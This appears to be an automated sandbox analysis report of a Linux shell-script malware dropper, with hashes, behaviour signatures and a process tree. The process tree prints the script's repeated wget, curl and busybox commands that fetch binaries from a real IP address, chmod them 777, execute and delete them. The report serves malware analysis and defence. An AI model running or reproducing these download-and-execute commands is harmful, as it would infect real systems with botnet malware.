Analysis
-
max time kernel
44s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25/10/2024, 01:08
Static task
static1
Behavioral task
behavioral1
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh
-
Size
10KB
-
MD5
28c4eef7e1bf06ceb5d700dae0b1904f
-
SHA1
8a4772667d8bbf3722d092d56e59e402d2e3e503
-
SHA256
5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3
-
SHA512
676f4792c15b78d5d2cab13afd6afca0936a62b130ef8c82785ff6d25875114a96a7316fee523c56633a748dc1e54b1425a99bd11427568faf75526d82fee445
-
SSDEEP
192:lSS5IXtliZl7j5NSFlXO5NSFlVhJtliZlR:lS8IE89w
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1513 chmod 1544 chmod 1550 chmod 1570 chmod 1594 chmod 1600 chmod 1612 chmod 1660 chmod 1666 chmod 1582 chmod 1624 chmod 1642 chmod 1672 chmod 1520 chmod 1507 chmod 1564 chmod 1576 chmod 1618 chmod 1630 chmod 1648 chmod 1654 chmod 1538 chmod 1588 chmod 1636 chmod 1556 chmod 1526 chmod 1532 chmod 1606 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg 1508 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 1514 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb 1521 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE 1527 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm 1533 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO 1539 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM 1545 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY 1551 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB 1557 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi 1565 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 1571 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D 1577 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA 1583 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF 1589 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D 1595 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA 1601 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF 1607 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 1613 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb 1619 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE 1625 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm 1631 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg 1637 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO 1643 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM 1649 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY 1655 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB 1661 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi 1667 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 1673 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg curl File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY curl File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB curl File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF curl File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb curl File opened for modification /tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB curl File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm curl File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi curl File opened for modification /tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF curl File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA curl File opened for modification /tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA curl File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE curl File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 curl File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO curl File opened for modification /tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE curl File opened for modification /tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm curl File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 curl File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D curl File opened for modification /tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23 curl File opened for modification /tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg curl File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM curl File opened for modification /tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8 curl File opened for modification /tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D curl File opened for modification /tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO curl File opened for modification /tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY curl File opened for modification /tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi curl File opened for modification /tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb curl File opened for modification /tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM curl
Processes
-
/tmp/5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh/tmp/5901e1172775bd06563708dbecf5570f6cfd6d5b6f4bb9502e7b74cd293965a3.sh1⤵PID:1499
-
/bin/rm/bin/rm bins.sh2⤵PID:1500
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:1501
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Writes file to tmp directory
PID:1502
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:1503
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:1507
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:1508
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:1509
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:1510
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Writes file to tmp directory
PID:1511
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:1512
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:1513
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:1514
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:1515
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:1516
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Writes file to tmp directory
PID:1518
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:1519
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:1520
-
-
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:1521
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:1522
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:1523
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Writes file to tmp directory
PID:1524
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:1525
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:1526
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:1527
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:1528
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:1529
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Writes file to tmp directory
PID:1530
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:1531
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:1533
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:1534
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:1535
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Writes file to tmp directory
PID:1536
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:1537
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:1538
-
-
/tmp/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO./EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Executes dropped EXE
PID:1539
-
-
/bin/rmrm EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:1540
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:1541
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Writes file to tmp directory
PID:1542
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:1543
-
-
/bin/chmodchmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- File and Directory Permissions Modification
PID:1544
-
-
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵
- Executes dropped EXE
PID:1545
-
-
/bin/rmrm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM2⤵PID:1546
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:1547
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Writes file to tmp directory
PID:1548
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:1549
-
-
/bin/chmodchmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- File and Directory Permissions Modification
PID:1550
-
-
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵
- Executes dropped EXE
PID:1551
-
-
/bin/rmrm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY2⤵PID:1552
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:1553
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:1555
-
-
/bin/chmodchmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- File and Directory Permissions Modification
PID:1556
-
-
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵
- Executes dropped EXE
PID:1557
-
-
/bin/rmrm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB2⤵PID:1558
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1559
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Writes file to tmp directory
PID:1560
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1563
-
-
/bin/chmodchmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi2⤵PID:1566
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1567
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1569
-
-
/bin/chmodchmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf82⤵PID:1572
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:1575
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:1578
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:1581
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:1584
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:1587
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:1590
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:1591
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:1593
-
-
/bin/chmodchmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵
- Executes dropped EXE
PID:1595
-
-
/bin/rmrm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D2⤵PID:1596
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:1599
-
-
/bin/chmodchmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA2⤵PID:1602
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:1605
-
-
/bin/chmodchmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF2⤵PID:1608
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:1609
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:1611
-
-
/bin/chmodchmod 777 N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/N5MrCH9SmUdH1khttWtqSks9l0GT7NCA23./N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm N5MrCH9SmUdH1khttWtqSks9l0GT7NCA232⤵PID:1614
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:1615
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:1617
-
-
/bin/chmodchmod 777 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb./1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm 1A42x4TT0CTwcLhVWCvAvnU023Ju4Z2GOb2⤵PID:1620
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:1623
-
-
/bin/chmodchmod 777 LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE./LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm LvouI6wFzA0Dk8ubpSihlfhorKwhzjLNTE2⤵PID:1626
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:1629
-
-
/bin/chmodchmod 777 rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm./rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm rOHRwXawFLdtITL7JWxA6B4JrztxBm9Pnm2⤵PID:1632
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:1635
-
-
/bin/chmodchmod 777 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg./3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm 3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg2⤵PID:1638
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵PID:1641
-
-
/bin/chmodchmod 777 EUTbcUHi4xIfIBbiLFmOXcVoMH7jNaHmsO2⤵
- File and Directory Permissions Modification
PID:1642
-
-
